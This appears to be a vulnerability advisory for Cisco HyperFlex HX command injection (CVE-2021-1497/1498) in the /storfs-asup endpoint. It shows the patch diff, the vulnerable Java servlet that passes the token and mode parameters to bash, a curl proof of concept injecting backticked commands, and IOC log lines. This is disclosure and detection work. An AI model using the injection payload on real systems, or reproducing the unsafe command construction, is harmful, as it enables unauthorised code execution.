Cisco HyperFlex HX 未授权命令注入漏洞（CVE-2021-1497 CVE-2021-1498）

# CVE-2021-1497 and/or CVE-2021-1498 Command injection in the `/storfs-asup` endpoint’s `token` and `mode` parameters. ## Patch ``` --- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500 +++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500 @@ -69,17 +69,6 @@ </servlet-mapping> <servlet> - <servlet-name>Springpath Storfs ASUP</servlet-name> - <servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class> - <load-on-startup>1</load-on-startup> - </servlet> - - <servlet-mapping> - <servlet-name>Springpath Storfs ASUP</servlet-name> - <url-pattern>/storfs-asup/*</url-pattern> - </servlet-mapping> - - <servlet> <servlet-name>Springpath Upgrade Image Upload Service</servlet-name> <servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class> </servlet> ``` ## Vulnerability ``` protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String action = request.getParameter("action"); if (action == null) { String msg = "Action for the servlet need be specified."; writeErrorResponse(response, msg); return; } try { String token = request.getParameter("token"); StringBuilder cmd = new StringBuilder(); cmd.append("exec /bin/storfs-asup "); cmd.append(token); String mode = request.getParameter("mode"); cmd.append(" "); cmd.append(mode); cmd.append(" > /dev/null"); logger.info("storfs-asup cmd to run : " + cmd); ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() }); logger.info("Starting the storfs-asup now: "); long startTime = System.currentTimeMillis(); Process p = pb.start(); InputStream errStream = p.getErrorStream(); String errMsg = FileUtils.readToString(errStream); int exitCode = p.waitFor(); long timeTaken = System.currentTimeMillis() - startTime; logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg); errStream.close(); OutputStream outStream = p.getOutputStream(); outStream.flush(); outStream.close(); if (exitCode != 0) throw new Exception(errMsg); } catch (IOException ex) { logger.error("Failed to generate asup: " + ex); } catch (Exception ie) { logger.error("Failed to run the /bin/storfs-asup command."); } finally { logger.info("Done executing asup command. "); } } ``` ## PoC ``` wvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`' * Trying 192.168.123.133... * TCP_NODELAY set * Connected to 192.168.123.133 (192.168.123.133) port 80 (#0) > POST /storfs-asup HTTP/1.1 > Host: 192.168.123.133 > User-Agent: curl/7.64.1 > Accept: */* > Content-Length: 28 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 28 out of 28 bytes < HTTP/1.1 200 OK < Server: nginx/1.8.1 < Date: Tue, 18 May 2021 00:54:26 GMT < Content-Length: 0 < Connection: keep-alive < Front-End-Https: on < * Connection #0 to host 192.168.123.133 left intact * Closing connection 0 wvu@kharak:~$ ``` ## IOCs ``` ==> /var/log/nginx/access.log <== 192.168.123.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1" ==> /var/log/springpath/stBootstrapGuiBackend.log <== 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now: 2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command. 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command. ==> /var/log/tomcat7/catalina.out <== 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now: 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command. 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command. ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <== 127.0.0.1 - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 - ```